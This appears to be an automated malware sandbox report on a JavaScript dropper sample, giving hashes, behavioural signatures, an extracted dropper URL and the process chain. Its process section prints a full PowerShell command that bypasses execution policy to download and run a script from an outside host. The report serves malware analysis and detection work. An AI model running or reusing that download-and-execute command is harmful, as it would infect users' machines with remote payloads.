Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
08-02-2024 14:29
Static task
static1
Behavioral task
behavioral1
Sample
DCS19011901.js
Resource
win7-20231215-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
DCS19011901.js
Resource
win10v2004-20231215-en
11 signatures
150 seconds
General
-
Target
DCS19011901.js
-
Size
29KB
-
MD5
0d0e14c18ac4db3bced742abbc1e80e6
-
SHA1
44977720d24a921e3b5cc52aadb99e8531a6985a
-
SHA256
87d72fac49d1573f32930344a6be4ea18c0409a2b8f0a53c2e0f5e0d57b49459
-
SHA512
3525f05b82e085ce67f43ad2f7f0168928a00122e1b86a1432f0e242532121e4160bbc0d81fcd2135d2dcb355d9535c5c5a300dcf3341ec875cf22840346c649
-
SSDEEP
768:NPnwrYNgIqAEAU5s1ZuRl+30XxVUlA5Oxay7HCA+4TJUwnbmZrLMqNcWgRb3KBBB:YVMKEiZNoa/TAC
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://assime.ca/command.php
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 2688 powershell.exe 6 2688 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2688 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
wscript.exedescription pid process target process PID 1944 wrote to memory of 2688 1944 wscript.exe powershell.exe PID 1944 wrote to memory of 2688 1944 wscript.exe powershell.exe PID 1944 wrote to memory of 2688 1944 wscript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\DCS19011901.js1⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://assime.ca/command.php')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688